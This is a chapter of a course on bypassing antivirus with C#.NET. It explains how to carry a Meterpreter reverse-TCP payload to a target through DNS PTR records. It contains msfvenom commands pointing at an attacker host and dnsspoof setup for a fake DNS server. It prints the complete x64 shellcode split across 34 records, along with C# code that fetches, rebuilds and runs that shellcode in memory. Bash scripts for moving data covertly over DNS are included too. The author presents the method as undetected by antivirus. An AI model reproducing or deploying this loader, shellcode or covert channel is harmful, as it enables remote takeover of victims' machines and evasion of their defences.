Course : Bypassing Anti Viruses by C#.

NET Programming
Part 2 (Infil/Exfiltration/Transferring Techniques by C#) , Chapter 3 : DATA Transferring / Downloading Method by DNS Traffic (PTR Records)

Chapter 3 : DATA Transferring / Downloading Method by DNS Traffic (PTR Records)

 Goal : Understanding this technique by C#
 Creating C#.NET Code and Testing.

Understanding this technique by C# : Bypassing Anti-viruses with Transferring Backdoor Payloads via DNS traffic

In this chapter I want to explain how can bypass anti-viruses without encryption method for payloads so in this chapter I want to
talk about DATA-Payload “Infiltration/Exfiltration/Transferring” Technique by DNS Traffic. In this technique I want to use DNS
protocol to Transfer my backdoor payloads from attacker computer to Client computer so in this case we need one backdoor
code “without” hard-coded payload or encrypted Payload.

Therefore risk for detecting by Anti-Viruses is very low in this case.

Why DNS protocol?

Because DNS traffic in the most networks are available without monitoring or Filtering by IPS/IDS or hardware firewalls and I
know you can Check DNS Traffic by Snort IPS/IDS or something like that but detecting new Payloads via DNS Traffic by
signatures is Difficult but is possible for network administrators .

In this article I want to show you one way to hiding your payloads by DNS Request/Response over Network.

Where is vulnerability point in this case?

When you want to use Payloads without encryption or Hard coded Payloads in your backdoor file like this case you need to
transfer Payloads over Network from your system to target computer by some Protocol like HTTP and DNS or … , in this case we
want to transfer these Payloads over DNS Traffic also execute these Payloads in Target computer memory so vulnerability point
is Payload location and vulnerability point is Anti-viruses methods for Detecting Malware. Because in this case we don’t have
Payloads on File-systems so we have Payload in memory and Network Traffic.

Note : “Unfortunately” Network traffic monitoring and Memory Monitoring/Scanning by AVs to Detect malware code do not work
very well or do not work always in the most Anti-viruses with or without IPS/IDS features.

Example: Backdoor Payloads in DNS Zone with PTR records and A records.

Picture 1: DNS Zone (IPAddress_to_DnsNameFQDN).

As you can see in this DNS zone I have two PTR records with meterpreter Payload like two FQDN And I have two PTR Record
for Backdoor Reconnect setting Time also one A record.

Splitting Payload values and Records!

If you want to bypassing Payload detection over Network DNS traffic by signature base Firewalls or IPS/IDS tools

One good way for do this is splitting your Payloads into DNS Records with same Type like PTR or other types also you can
encrypt your Payloads then use these Protocols. it depends on you and your target network.

1 / 19 Course Author/Publisher : Damon Mohammadbagher

Course : Bypassing Anti Viruses by C#.NET Programming
Part 2 (Infil/Exfiltration/Transferring Techniques by C#) , Chapter 3 : DATA Transferring / Downloading Method by DNS Traffic (PTR Records)
You can see in picture 1, I have five records for Splitting one Payload in this case Meterpreter Payload Line one.

Therefore payloads for these records are equal with payload for this record 1.1.1.0

Example: 1.0.1.0 + 1.0.1.1 + 1.0.1.2 + 1.0.1.3 + 1.0.1.4 = 1.1.1.0

It means you can have:

five DNS request for 1.0.1.x * 5 <=> 5 response with result like (1 response from payload-0 by PTR record 1.1.1.0)

Or

one DNS Request for 1.1.1.0 <=> 1 Response by (payload-0 by PTR record 1.1.1.0)

In client side you can get this information from fake DNS server by more tools or technique but I want to use NSLOOKUP
command prompt by backdoor because I think this is very simple to use.

As you can see in picture 2, I try to test DNS traffic from Fake DNS server to Client by NSLOOKUP tool.

Picture 2: Nslookup command and Testing DNS Traffic.

Now I want to talk about how can make Fake DNS server with linux and Meterpreter Payload via DNS Records And finally use
my tool NativePayload_DNS.exe to execute Payload and getting Meterpreter session by DNS traffic.

STEP1: Make Fake DNS Server with Meterpreter Payloads Step by step:

In this step you should make Meterpreter Payload with Msfvenom Tool like picture 4 and copy that Payload line by line to dns.txt
file then Use this file by DNSSpoof tool for making Fake DNS Server with kali Linux.

But before I explain how can do this first I should show you Meterpreter Payload with “Exe” file and Test this Payload with All anti-
viruses then you can see this Payload and this signature will detect by the most Anti-viruses when you used that with EXE
format.

Why I want to show this one?

Because I want to show you , I used two same Payloads by two techniques first by “EXE” format file and second by Transfer via
DNS Traffic and you can see EXE format will detect by Anti-viruses but AVs can’t Detect Second technique “Transfer by DNS
traffic” and we know both method had same Payload .

2 / 19 Course Author/Publisher : Damon Mohammadbagher

Course : Bypassing Anti Viruses by C#.NET Programming
Part 2 (Infil/Exfiltration/Transferring Techniques by C#) , Chapter 3 : DATA Transferring / Downloading Method by DNS Traffic (PTR Records)

Example1 , First technique EXE format: msfvenom –-platform windows –arch x86_64 –p
windows/x64/meterpreter/reverse_tcp lhost=192.168.1.50 –f exe > /root/Desktop/payload.exe

As you can see in picture 3 my payload with EXE format detected by 11 anti-viruses.

Picture 3: EXE Format payload Detected by AVs

Ok now for second technique you should use this one with C type or Csharp type ( -f : Transform Type)

Example2 , second technique DNS Traffic: msfvenom –-platform windows –arch x86_64 –p
windows/x64/meterpreter/reverse_tcp lhost=192.168.1.50 –f c > /root/Desktop/payload.txt

After make payload.txt file , now you should make dns.txt file and copy your payloads line by line to dns.txt file like format as you
can see in picture 4.

This is really important you have correct Format in dns.txt file.

Because we want to use this file by Dnsspoof tool with linux and your format should be something like this:

Ipaddress “{payload}.domain.com”

1.1.1.0 “0xfc0x480x830xe40xf00xe8.1.com”

1.1.1.1 “0xbc0xc80x130xff0x100x08.1.com”

In this case because my C# backdoor code customized for domain name “1.com” we should use this name for domain Or
something like that “2.com”, “3.net”, “t.com” or domain with one char name + ".com"

So in this case ipaddress “1.1.1.x” is our Counter for our Payload lines in our dns.txt file.

1.1.1.0 --> Line 0 in payload.txt file --> “{payload0}.1.com”

1.1.1.1 --> Line 1 in payload.txt file --> “{payload1}.1.com”

1.1.1.2 --> Line 2 in payload.txt file --> “{payload2}.1.com”

3 / 19 Course Author/Publisher : Damon Mohammadbagher

Course : Bypassing Anti Viruses by C#.NET Programming
Part 2 (Infil/Exfiltration/Transferring Techniques by C#) , Chapter 3 : DATA Transferring / Downloading Method by DNS Traffic (PTR Records)

Picture 4: step1 for make fake DNS server and Meterpreter payloads

After make dns.txt file you should have this file like picture 5.

Picture5: Dns.txt file for make Fake DNS Server by dnsspoof tool

4 / 19 Course Author/Publisher : Damon Mohammadbagher

Course : Bypassing Anti Viruses by C#.NET Programming
Part 2 (Infil/Exfiltration/Transferring Techniques by C#) , Chapter 3 : DATA Transferring / Downloading Method by DNS Traffic (PTR Records)
Ok now you can use dnsspoof tool like picture 6 for starting Fake DNS Server in your linux.

Picture 6: dnsspoof tool

in step 2 we need to use one backdoor for Downloading Payloads from Fake DNS server by DNS Traffic.

In this case I made this C# source code for do that and in my code I used nslookup.exe tool for sending dns requests finally my
code will dump backdoor Payloads via DNS PTR Response from FakeDNSserver over network.

STEP2:

After compile this code you have one exe file and for execute this exe file you should use this syntax in command prompt:

Command Syntax:

NativePayload_DNS.exe “Start_IpAddress” Counter “FakeDNSServer_IpAddress”

Example: C:\> NativePayload_DNS.exe 1.1.1. 34 192.168.1.50

Start_IpAddress : is your first IpAddress for you PTR Records without last section for HostID { 1 . 1 . 1 . } so in this case
you should type three “1.” for this argument.

Counter : is DNS PTR Records number in this case we have 1.1.1.0 …. 1.1.1.33 in our dns.txt file so number is 34

FakeDNSServer_IpAddress : FakeDNS_IP is our DNS server IPaddress or Attacker FakeDNSserver in this case our
kali linux ipaddress is 192-168-1-50

Before execute this backdoor remember you should made listener for metasploit

in your kali linux with ipadress 192-168-1-50.

5 / 19 Course Author/Publisher : Damon Mohammadbagher

Course : Bypassing Anti Viruses by C#.NET Programming
Part 2 (Infil/Exfiltration/Transferring Techniques by C#) , Chapter 3 : DATA Transferring / Downloading Method by DNS Traffic (PTR Records)
Now you can execute this backdoor like picture 7:

NativePayload_DNS.exe 1.1.1. 34 192.168.1.50

Picture 7 : NativePayload_DNS tool

As you can see in picture 7 this backdoor tried to send DNS Request for ipaddress 1.1.1.x also you can see each Response.

In the next picture you can see our network traffic between Client and Attacker FakeDNS_Server

Picture 8: Transfer Meterpreter Payloads by DNS Traffic

Finally after 34 countdown you will have Meterpreter Session in Attacker Side like picture 9 and unfortunately as you can see my

6 / 19 Course Author/Publisher : Damon Mohammadbagher

Course : Bypassing Anti Viruses by C#.NET Programming
Part 2 (Infil/Exfiltration/Transferring Techniques by C#) , Chapter 3 : DATA Transferring / Downloading Method by DNS Traffic (PTR Records)
Anti-Viruses can’t detect this Technique , and I think the most AVs can’t Detect this Technique so if you Check this Technique by
other AVs please tell me by Writing comment here also please explain which one of AVs detected this Technique and what
version ;) thank you guys.

Picture 9: Meterpreter Session by DNS Traffic

And you can see my anti-virus again bypassed ;-) also this is my Result for scanning my Source Code by All anti-viruses now you
can compare “Picture 3” with “Picture 10” Both Backdoors worked by same Payloads , (warning : Don't use VirusTotal or this site
for testing your Codes Never ever)

Picture 10: NativePayload_DNS (AVs result = 0 detected)

7 / 19 Course Author/Publisher : Damon Mohammadbagher

Course : Bypassing Anti Viruses by C#.NET Programming
Part 2 (Infil/Exfiltration/Transferring Techniques by C#) , Chapter 3 : DATA Transferring / Downloading Method by DNS Traffic (PTR Records)
And in the next picture you can see what happened behind my C# source code by NSLOOKUP tool.

Picture 11 : Nslookup and UDP connections for DNS Traffic

Finally you can see my Meterpreter Session with tcpview tool and putty tool in next pictures

Picture 12: Tcpview and TCP connection established when Backdoor Payload Downloaded from DNSServer.

in picture 13 you can see meterpreter Session too :

8 / 19 Course Author/Publisher : Damon Mohammadbagher

Course : Bypassing Anti Viruses by C#.NET Programming
Part 2 (Infil/Exfiltration/Transferring Techniques by C#) , Chapter 3 : DATA Transferring / Downloading Method by DNS Traffic (PTR Records)

Picture 13: Meterpreter Session.

At a glance : you can’t trust to Anti-viruses for defense always so with this technique or other ways for Transfer Payload
by other protocols in network , your network and your Client/Server is Vulnerable too so please check this technique in
your Anti-viruses and share your Experience here by comments .

Creating C#.NET Code and Testing:

In this technique we used DNS traffic by PTR records so for doing this we need some tools or Code for Sending DNS traffic so in
this case our Code uses NSLOOKUP tool for DNS requests and Response so in our C# Code we need to use this Command by
this Code :
public static string __nslookup(string DNS_PTR_A, string DnsServer)
{
/// Make DNS traffic for getting Meterpreter Payloads by nslookup

ProcessStartInfo ns_Prcs_info = new ProcessStartInfo("nslookup.exe", DNS_PTR_A + " " + DnsServer);

ns_Prcs_info.RedirectStandardInput = true;
ns_Prcs_info.RedirectStandardOutput = true;
ns_Prcs_info.UseShellExecute = false;
// you can use Thread Sleep here

Process nslookup = new Process();

nslookup.StartInfo = ns_Prcs_info;
nslookup.StartInfo.WindowStyle = ProcessWindowStyle.Hidden;
nslookup.Start();

/// if you want to change your Domain Name from "1.com" to "22.com"
/// then you should change these Settings and Values too ;)

string computerList = nslookup.StandardOutput.ReadToEnd();

string[] lines = computerList.Split('\r', 'n');
string last_line = lines[lines.Length - 4];
string temp_1 = last_line.Remove(0, 11);
_Records = "\"" + temp_1;
int i = temp_1.LastIndexOf('.');
string temp_2 = temp_1.Remove(i, (temp_1.Length - i));
int b = temp_2.LastIndexOf('.');
string final = temp_2.Remove(b, temp_2.Length - b);
return final;
}

9 / 19 Course Author/Publisher : Damon Mohammadbagher

Course : Bypassing Anti Viruses by C#.NET Programming
Part 2 (Infil/Exfiltration/Transferring Techniques by C#) , Chapter 3 : DATA Transferring / Downloading Method by DNS Traffic (PTR Records)

Code 1:

as you can see in this “Code 1” our DNS_PTR_A variable is our IPAddress in this case “1.1.1.” so

c:\> NativePayload_DNS.exe 1.1.1. 34 192.168.1.50

 1.1.1. is our DNS_PTR_A variable

 34 is our _IPAddress_counter variable (we will talk about that in next pictures)
 192.168.1.50 is our DnsServer variable

also in Picture “Code 1” you can see “Section 1” code , by this “Section 1” you will have NSLOOKUP with PTR output for each
IPAddress like this , in this example this is Nslookup output “PTR Record” for IPAddress “1.1.1.1” also you can see this output in
“Picture 2” by Cmd.exe too.

"0xfc0x480x830xe40xf00xe80xcc0x000x000x000x410x510x410x500x52.1.com"
Note: this Section 1 optimized for Domain Names by one character like “1.com” or ”a.com” or “b.net” or “c.org” so if you want to
change your Domain Name from one Character to two or three characters then you should change these codes too.

Code 2:

10 / 19 Course Author/Publisher : Damon Mohammadbagher

Course : Bypassing Anti Viruses by C#.NET Programming
Part 2 (Infil/Exfiltration/Transferring Techniques by C#) , Chapter 3 : DATA Transferring / Downloading Method by DNS Traffic (PTR Records)

in Picture “Code 2” you can see how our DNS_PTR_A variable will work in lines 105,106,107 so by this code
for (int i = 0; i < _IPaddress_Counter; i++)
{
_DATA[i] = __nslookup(_IPaddress_Begin + i, _DnsServer);
DATA += _DATA[i].ToString();
Console.ForegroundColor = ConsoleColor.DarkGray;
Console.WriteLine("DNS Request Send: {0}", (_IPaddress_Begin + i).ToString());
Console.ForegroundColor = ConsoleColor.DarkYellow;
Console.WriteLine("DNS Response type PTR Record: {0}", _Records);
Console.ForegroundColor = ConsoleColor.DarkGray;
}

Important point in this code is here _IPaddress_Begin + i by this code you will have IPAddress 1.1.1. + I because our _Ipaddress_Begin =
1.1.1. and our I variable was started with 0 up to 33 , why 33 because our _IPaddress_Counter = 33 , it means we have 34 IPAddress .

_DATA[i] = __nslookup(_IPaddress_Begin + i, _DnsServer);

so we have something like this Commands by this section of code :

nslookup 1.1.1.0 192.168.1.50 output == > "0xfc0x480x830xe40xf00xe80xcc0x000x000x000x410x510x410x500x52.1.com"

nslookup 1.1.1.1 192.168.1.50 output == > "0x510x560x480x310xd20x650x480x8b0x520x600x480x8b0x520x180x48.1.com"
nslookup 1.1.1.2 192.168.1.50 output == > "0x8b0x520x200x480x8b0x720x500x480x0f0xb70x4a0x4a0x4d0x310xc9.1.com"
nslookup 1.1.1.3 192.168.1.50 output == > "0x480x310xc00xac0x3c0x610x7c0x020x2c0x200x410xc10xc90x0d0x41.1.com"
.
.
.
nslookup 1.1.1.31 192.168.1.50 output == > "0x570x590x410xba0x750x6e0x4d0x610xff0xd50x490xff0xce0xe90x3c.1.com"
nslookup 1.1.1.32 192.168.1.50 output == > "0xff0xff0xff0x480x010xc30x480x290xc60x480x850xf60x750xb40x41.1.com"
nslookup 1.1.1.33 192.168.1.50 output == > "0xff0xe70x580x6a0x000x590x490xc70xc20xf00xb50xa20x560xff0xd5.1.com"

Now by this code you can make one Variable with all nslookup output or our Meterpreter Payload by PTR Records .
DATA += _DATA[i].ToString();

so by this code we have something like this :

DATA = “0xfc0x480x830xe40xf00xe80xcc0x000x000x000x410x510x410x500x52.1.com” +
"0x510x560x480x310xd20x650x480x8b0x520x600x480x8b0x520x180x48.1.com" +
"0x8b0x520x200x480x8b0x720x500x480x0f0xb70x4a0x4a0x4d0x310xc9.1.com" +
"0x480x310xc00xac0x3c0x610x7c0x020x2c0x200x410xc10xc90x0d0x41.1.com" + ….. +
"0x570x590x410xba0x750x6e0x4d0x610xff0xd50x490xff0xce0xe90x3c.1.com" + "0xff0xff0xff0x480x010xc30x480x290xc60x480x850xf60x750xb40x41.1.com" +
"0xff0xe70x580x6a0x000x590x490xc70xc20xf00xb50xa20x560xff0xd5.1.com"

or

DATA =
“0xfc0x480x830xe40xf00xe80xcc0x000x000x000x410x510x410x500x52.1.com0x510x560x480x310xd20x650x480x8b0x520x600x480x8b0x520x180x48.1.com0
x8b0x520x200x480x8b0x720x500x480x0f0xb70x4a0x4a0x4d0x310xc9.1.com0x480x310xc00xac0x3c0x610x7c0x020x2c0x200x410xc10xc90x0d0x41.1.com…
0x570x590x410xba0x750x6e0x4d0x610xff0xd50x490xff0xce0xe90x3c.1.com0xff0xff0xff0x480x010xc30x480x290xc60x480x850xf60x750xb40x41.1.com"0xff0xe
70x580x6a0x000x590x490xc70xc20xf00xb50xa20x560xff0xd5.1.com"

11 / 19 Course Author/Publisher : Damon Mohammadbagher

Course : Bypassing Anti Viruses by C#.NET Programming
Part 2 (Infil/Exfiltration/Transferring Techniques by C#) , Chapter 3 : DATA Transferring / Downloading Method by DNS Traffic (PTR Records)

Code 3:

in this step of code we should make Payload by this Variable “DATA” so for doing this first of all we can use “split()” for chunking
Payloads .
string[] Payload__Without_delimiterChar = DATA.Split('x');
object tmp = new object();
byte[] __Bytes = new byte[DATA.Length / 4];
for (int i = 1; i < __Bytes.Length; i++)
{
tmp = Payload__Without_delimiterChar[i].ToString().Substring(0, 2);
byte current = Convert.ToByte("0x" + tmp.ToString(), 16);
__Bytes[i] = current;
}

“0xfc0x480x830xe40xf00xe80xcc0x000x000x000x410x510x410x500x52.1.com0x510x560”
string[] Payload__Without_delimiterChar = DATA.Split('x');

so by this code our DATA will transform to this

0 , fc0 , 480 , 830 , e40 , f00 , e80 , cc0 , 000 , 000 , 000 , 410 , 510 , 410 , 500 , 52.1.com0 , 510 , 560

also you can see this technique by “split()” in Picture “Code 3-1”

Code 3-1:

12 / 19 Course Author/Publisher : Damon Mohammadbagher

Course : Bypassing Anti Viruses by C#.NET Programming
Part 2 (Infil/Exfiltration/Transferring Techniques by C#) , Chapter 3 : DATA Transferring / Downloading Method by DNS Traffic (PTR Records)

Example C#_Code1 :
string[] Payload__Without_delimiterChar = DATA.Split('x');
object tmp = new object();
byte[] __Bytes = new byte[DATA.Length / 4];
for (int i = 1; i < __Bytes.Length; i++)
{
tmp = Payload__Without_delimiterChar[i].ToString().Substring(0, 2);
byte current = Convert.ToByte("0x" + tmp.ToString(), 16);
__Bytes[i] = current;
}

in next picture “Code 3-2” I will explain why I used “DATA.Lentgth / 4” , this is important because we want make one variable for
our Payloads with Bytes[] Type so we should know what is our Length for this Meterpreter Payload so for figure out this just need
to see Picture “Code 3-2” in this Picture you can see we have 4 strings between each “x” :

it means 3 strings + x = 4 strings

“0xfc0x480x830xe40xf00xe80xcc0x000x000x000x410x510x410x500x52.1.com0x510x560”

also you can use this Example C#_Code2 if you got ERROR with this Example C#_Code1.

Example C#_Code2 :
string[] Payload__Without_delimiterChar = DATA.Split('x');
object tmp = new object();
byte[] __Bytes = new byte[Payload__Without_delimiterChar .Length];
for (int i = 1; i < __Bytes.Length; i++)
{
tmp = Payload__Without_delimiterChar[i].ToString().Substring(0, 2);
byte current = Convert.ToByte("0x" + tmp.ToString(), 16);
__Bytes[i] = current;
}

ok both of these codes will work very well but we have one problem by this Code so I will explain where is Problem , the problem
is first string in this Payload .

“0xfc0x480x830xe40xf00xe80xcc0x000x000x000x410x510x410x500x52.1.com0x510x560”

as you can see in Picture “Code3-1” after this code

string[] Payload__Without_delimiterChar = DATA.Split('x');

our String Array Variable started by 0 in Payload__Without_delimiterChar [0].

Payload__Without_delimiterChar [0] = 0
Payload__Without_delimiterChar [1] = fc0 <=== Meterpreter Payload Started from this Value
Payload__Without_delimiterChar [2] = 480

so this Byte will make Problem because this is my bug ;D in my code and this is not section of Meterpreter Payload so how can
fix this ?

You can fix it by assigning value 1 to I.

for (int i = 1; i < __Bytes.Length; i++)
{
tmp = Payload__Without_delimiterChar[i].ToString().Substring(0, 2);
byte current = Convert.ToByte("0x" + tmp.ToString(), 16);
__Bytes[i] = current;
}

as you can see in Picture Code 3-3 this trick worked very well and you have Correct Payload in your Byte Array variable and in
picture “Code 3-2” you can see “Section A” for creating Thread by this Byte Array Variable in this case “__Bytes” so about how
this “Section A” worked we Talked in previous chapters especially in “Chapter 1” .

13 / 19 Course Author/Publisher : Damon Mohammadbagher

Course : Bypassing Anti Viruses by C#.NET Programming
Part 2 (Infil/Exfiltration/Transferring Techniques by C#) , Chapter 3 : DATA Transferring / Downloading Method by DNS Traffic (PTR Records)

Code 3-2:

Code 3-3

Using this method on Linux systems only : NativePayload_DNS.sh Script and Linux systems

now in this Part of this chapter I want to talk about this Method on Linux systems only so in this case I made 2 scripts for this
method first for Make DNS PTR Records via Host.txt file , second is NativePayload_DNS.sh Script for Dump/Download DATA via
DNS PTR records.

Note : in this case I used these Scripts to Dump/Download “Text” as DATA via DNS PTR Records .

As you can see in the next picture I used these two Scripts on two Linux systems .

Using Scripts Step by step :

Step 1 (system A) : first of all you need to Create one Host file as DNS Records to use by “Dnsspoof” tool so for make it you can
use this Script “DnsHostCreator.sh“

14 / 19 Course Author/Publisher : Damon Mohammadbagher

Course : Bypassing Anti Viruses by C#.NET Programming
Part 2 (Infil/Exfiltration/Transferring Techniques by C#) , Chapter 3 : DATA Transferring / Downloading Method by DNS Traffic (PTR Records)
to use this Script your syntax is this :

syntax : ./DnsHostCreator.sh SourceTextFile.txt DomainName ChunkNumber

Example 1 : ./DnsHostCreator.sh 1.txt microsoft.com 10 > host.txt

in this case in file “1.txt” I have this text “Transferring DATA via DNS PTR Records ;).” and with “Example 1” I will have something
like these lines in “host.txt”

File host.txt :

192.168.1.6 temp.microsoft.com
# injecting this text via this host.domain: Transferri ==> 5472616e736665727269.microsoft.com
192.168.1.0 5472616e736665727269.microsoft.com
# injecting this text via this host.domain: ng DATA vi ==> 6e672044415441207669.microsoft.com
192.168.1.1 6e672044415441207669.microsoft.com
# injecting this text via this host.domain: a DNS PTR ==> 6120444e532050545220.microsoft.com
192.168.1.2 6120444e532050545220.microsoft.com
# injecting this text via this host.domain: Records ;) ==> 5265636f726473203b29.microsoft.com
192.168.1.3 5265636f726473203b29.microsoft.com
# injecting this text via this host.domain: . ==> 2e.microsoft.com
192.168.1.4 2e.microsoft.com

as you can see these Text Injected to “Hosts” for Domain “microsoft.com” it means :

host = text == > 5472616e736665727269 = Transferri

injecting this text via this host.domain: Transferri ==> 5472616e736665727269.microsoft.com
Step 1-2 (system A) : now you should make Fake DNS Server by this file “host.txt” via dnsspoof tool

Example 1-2 : ./dnsspoof -f host.txt

Step 2 (system B) : now in this Step you can Download these Injected Text to Host-Name for domain “microsoft.com from
“system A” to “system B” with this syntax :

syntax : ./NativePayload_DNS.sh DomainName TargetDNSServer Delay(sec)

Example 2 : ./NativePayload_DNS.sh microsoft.com 192.168.56.1 2

15 / 19 Course Author/Publisher : Damon Mohammadbagher

Course : Bypassing Anti Viruses by C#.NET Programming
Part 2 (Infil/Exfiltration/Transferring Techniques by C#) , Chapter 3 : DATA Transferring / Downloading Method by DNS Traffic (PTR Records)

DnsHostCreator.sh , Script Code :

#!/bin/sh

# syntax0 : ./DnsHostCreator.sh SourceTextFile.txt DomainName ChunkNumber

# syntax0 : ./DnsHostCreator.sh text.txt Test.com 20 > myhost.txt

# Example : dnsspoof -f myhost.txt

echo "DnsHostCreator.sh v1.0 , Published by Damon Mohammadbagher 2017-2018"

echo "Injecting DATA to DNS Traffic via DNS PTR Records and Host.txt"

echo ""

cu=0

for op in `xxd -p -c $3 $1`; do

((cu++))

done

((cu++))

echo 192.168.1.$cu "temp.$2"

x=0

for ops in `xxd -p -c $3 $1`; do

Exfil=$ops

t=`echo $Exfil | xxd -r -p`

echo "# injecting this text via this host.domain: " $t " ==> " $Exfil.$2

echo 192.168.1.$x "$Exfil.$2"

((x++))

done

NativePayload_DNS.sh , Script Code :

#!/bin/sh

# syntax ./NativePayload_DNS.sh DomainName TargetDNSServer delay

# syntax ./NativePayload_DNS.sh test.com 192.168.1.10 3

tput setaf 2;

echo "NativePayload_DNS.sh v1.0 , Published by Damon Mohammadbagher 2017-2018"

echo "Exfil/Infiltration/Transferring DATA via DNS PTR Records"

echo ""

temp=`nslookup temp.$1 $2 | grep Add | awk {'print $2'}`

temp2=`echo $temp | awk {'print $2'}`

echo "[!] Detecting Temp host: "$temp2

myloops=`echo $temp2 | cut -d'.' -f4`

echo "[!] Detecting PTR Records/Requests: "$myloops

first_ip="`echo $temp2 | cut -d'.' -f1`"

first_ip+=".`echo $temp2 | cut -d'.' -f2`"

first_ip+=".`echo $temp2 | cut -d'.' -f3`."

echo "[!] Detecting First Request: "$first_ip"x"

16 / 19 Course Author/Publisher : Damon Mohammadbagher

Course : Bypassing Anti Viruses by C#.NET Programming
Part 2 (Infil/Exfiltration/Transferring Techniques by C#) , Chapter 3 : DATA Transferring / Downloading Method by DNS Traffic (PTR Records)
echo "[!] Delay time (sec): "$3

counter=0

timedelay=0

alldumps=``;

while(true)

do

echo "--------------------------"

first_ip="`echo $temp2 | cut -d'.' -f1`"

first_ip+=".`echo $temp2 | cut -d'.' -f2`"

first_ip+=".`echo $temp2 | cut -d'.' -f3`.$counter"

tput setaf 2;

time=`date '+%d/%m/%y %H:%M:%S'`

echo "[!] "[$counter] [$time] " Lookup : " $first_ip

tput setaf 11;

final= echo "[!] "[$counter]" Domain: " "`nslookup $first_ip $2 | grep arpa | awk {'print $4'}`"

tput setaf 3;

finals= echo "[!] "[$counter]" Text: " "`nslookup $first_ip $2 | grep arpa | awk {'print $4'} | xxd -r -p`"

alldumps+="`nslookup $first_ip $2 | grep arpa | awk {'print $4'} | xxd -r -p`"

tput setaf 10;

echo "[>] "[$counter]" Dumped DATA : " $alldumps

((counter++))

sleep $3

if(($counter == $myloops))

then

break

fi

done

NativePayload_DNS.exe , C# Code :

Supported only in .NET Framework 2.0 , 3.0 , 3.5 , 4.0

using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.Linq;
using System.Runtime.InteropServices;
using System.Text;

namespace NativePayload_DNS
{
class Program
{
static void Main(string[] args)
{
string _DnsServer = "192.168.1.50";
/// 1.1.1.{x} ==> x = 0 ... 33
string _IPaddress_Begin = "1.1.1.";
int _IPaddress_Counter = 34;
///
/// step 1:
/// msfvenom C type payload in your kali linux
/// msfvenom –-platform windows –arch x86_64 –p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.50 –f c > /root/Desktop/payload.txt
/// copy payloads from payload.txt file to dns.txt like this format:
///
///

17 / 19 Course Author/Publisher : Damon Mohammadbagher

Course : Bypassing Anti Viruses by C#.NET Programming
Part 2 (Infil/Exfiltration/Transferring Techniques by C#) , Chapter 3 : DATA Transferring / Downloading Method by DNS Traffic (PTR Records)
/// root@kali:~# cat /root/Desktop/dns.txt
///
///1.1.1.0 "0xfc0x480x830xe40xf00xe80xcc0x000x000x000x410x510x410x500x52.1.com"
///1.1.1.1 "0x510x560x480x310xd20x650x480x8b0x520x600x480x8b0x520x180x48.1.com"
///1.1.1.2 "0x8b0x520x200x480x8b0x720x500x480x0f0xb70x4a0x4a0x4d0x310xc9.1.com"
///1.1.1.3 "0x480x310xc00xac0x3c0x610x7c0x020x2c0x200x410xc10xc90x0d0x41.1.com"
///1.1.1.4 "0x010xc10xe20xed0x520x410x510x480x8b0x520x200x8b0x420x3c0x48.1.com"
///1.1.1.5 "0x010xd00x660x810x780x180x0b0x020x0f0x850x720x000x000x000x8b.1.com"
///1.1.1.6 "0x800x880x000x000x000x480x850xc00x740x670x480x010xd00x500x8b.1.com"
///1.1.1.7 "0x480x180x440x8b0x400x200x490x010xd00xe30x560x480xff0xc90x41.1.com"
///1.1.1.8 "0x8b0x340x880x480x010xd60x4d0x310xc90x480x310xc00xac0x410xc1.1.com"
///1.1.1.9 "0xc90x0d0x410x010xc10x380xe00x750xf10x4c0x030x4c0x240x080x45.1.com"
///1.1.1.10 "0x390xd10x750xd80x580x440x8b0x400x240x490x010xd00x660x410x8b.1.com"
///1.1.1.11 "0x0c0x480x440x8b0x400x1c0x490x010xd00x410x8b0x040x880x480x01.1.com"
///1.1.1.12 "0xd00x410x580x410x580x5e0x590x5a0x410x580x410x590x410x5a0x48.1.com"
///1.1.1.13 "0x830xec0x200x410x520xff0xe00x580x410x590x5a0x480x8b0x120xe9.1.com"
///1.1.1.14 "0x4b0xff0xff0xff0x5d0x490xbe0x770x730x320x5f0x330x320x000x00.1.com"
///1.1.1.15 "0x410x560x490x890xe60x480x810xec0xa00x010x000x000x490x890xe5.1.com"
///1.1.1.16 "0x490xbc0x020x000x110x5c0xc00xa80x010x320x410x540x490x890xe4.1.com"
///1.1.1.17 "0x4c0x890xf10x410xba0x4c0x770x260x070xff0xd50x4c0x890xea0x68.1.com"
///1.1.1.18 "0x010x010x000x000x590x410xba0x290x800x6b0x000xff0xd50x6a0x05.1.com"
///1.1.1.19 "0x410x5e0x500x500x4d0x310xc90x4d0x310xc00x480xff0xc00x480x89.1.com"
///1.1.1.20 "0xc20x480xff0xc00x480x890xc10x410xba0xea0x0f0xdf0xe00xff0xd5.1.com"
///1.1.1.21 "0x480x890xc70x6a0x100x410x580x4c0x890xe20x480x890xf90x410xba.1.com"
///1.1.1.22 "0x990xa50x740x610xff0xd50x850xc00x740x0a0x490xff0xce0x750xe5.1.com"
///1.1.1.23 "0xe80x930x000x000x000x480x830xec0x100x480x890xe20x4d0x310xc9.1.com"
///1.1.1.24 "0x6a0x040x410x580x480x890xf90x410xba0x020xd90xc80x5f0xff0xd5.1.com"
///1.1.1.25 "0x830xf80x000x7e0x550x480x830xc40x200x5e0x890xf60x6a0x400x41.1.com"
///1.1.1.26 "0x590x680x000x100x000x000x410x580x480x890xf20x480x310xc90x41.1.com"
///1.1.1.27 "0xba0x580xa40x530xe50xff0xd50x480x890xc30x490x890xc70x4d0x31.1.com"
///1.1.1.28 "0xc90x490x890xf00x480x890xda0x480x890xf90x410xba0x020xd90xc8.1.com"
///1.1.1.29 "0x5f0xff0xd50x830xf80x000x7d0x280x580x410x570x590x680x000x40.1.com"
///1.1.1.30 "0x000x000x410x580x6a0x000x5a0x410xba0x0b0x2f0x0f0x300xff0xd5.1.com"
///1.1.1.31 "0x570x590x410xba0x750x6e0x4d0x610xff0xd50x490xff0xce0xe90x3c.1.com"
///1.1.1.32 "0xff0xff0xff0x480x010xc30x480x290xc60x480x850xf60x750xb40x41.1.com"
///1.1.1.33 "0xff0xe70x580x6a0x000x590x490xc70xc20xf00xb50xa20x560xff0xd5.1.com"
///
/// step 2: Make Fake DNS server in your kali linux
///root@kali:~# dnsspoof -i eth0 -f /root/Desktop/dns.txt
/// step 3:
/// run code in client
/// syntax: NativePayload_DNS.exe "1.1.1." 34 "192.168.1.50"
/// finally you can bypass AVs and you have Meterpreter Session
///

try
{
/// IP Address for Resolve ==> IPAddress to FQDN
_IPaddress_Begin = args[0].ToString();
/// Number for Counter
/// for example 1.1.1. by 34 ==> 1.1.1.0 , 1.1.1.1 , .... , 1.1.1.32 , 1.1.1.33
_IPaddress_Counter = Convert.ToInt32(args[1]);
/// Attacker Fake DNS Server
